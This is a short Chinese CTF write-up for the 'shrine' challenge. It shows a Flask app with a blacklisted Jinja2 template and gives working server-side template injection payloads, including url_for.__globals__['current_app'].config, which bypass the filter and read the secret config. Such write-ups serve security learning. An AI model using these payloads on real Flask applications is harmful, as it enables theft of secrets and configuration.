来自:
[WesternCTF2018]shrine
打开是一段源码,这里贴一下:
import flask import os app = flask.Flask(__name__) app.config['FLAG'] = os.environ.pop('FLAG') #注册了一个名字为FLAG的config,推测flag在这里面 @app.route('/') def index(): return open(__file__).read() @app.route('/shrine/') #这里可以在url上进行SSTI注入 def shrine(shrine): def safe_jinja(s): s = s.replace('(', '').replace(')', '') #把括号给过滤了,s中的括号会被删掉 blacklist = ['config', 'self'] #黑名单把这config 和 self过滤掉了,如s中有会被删掉 return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s return flask.render_template_string(safe_jinja(shrine)) if __name__ == '__main__': app.run(debug=True)
经典老图:
直接在url上注一下:
<url>/shrine/{{7*7}}
说明可以注。
网上搜的方法,原文:https://blog.csdn.net/xhy18634297976/article/details/123154407
这里可以利用两个python自带的函数来进行注入
url_for这个可以用来构造url,接受函数名作为第一个参数
get_flashed_message()是通过flash()传入闪现信息列表的,能够把字符串对象表示的信息加入到一个消息列表,然后通过调用get_flashed_message()来取出。
权当积累了:
<url>/shrine/{{url_for.__globals__}}
发现这个current_app,直接payload:
<url>/shrine/{{url_for.__globals__['current_app'].config}}
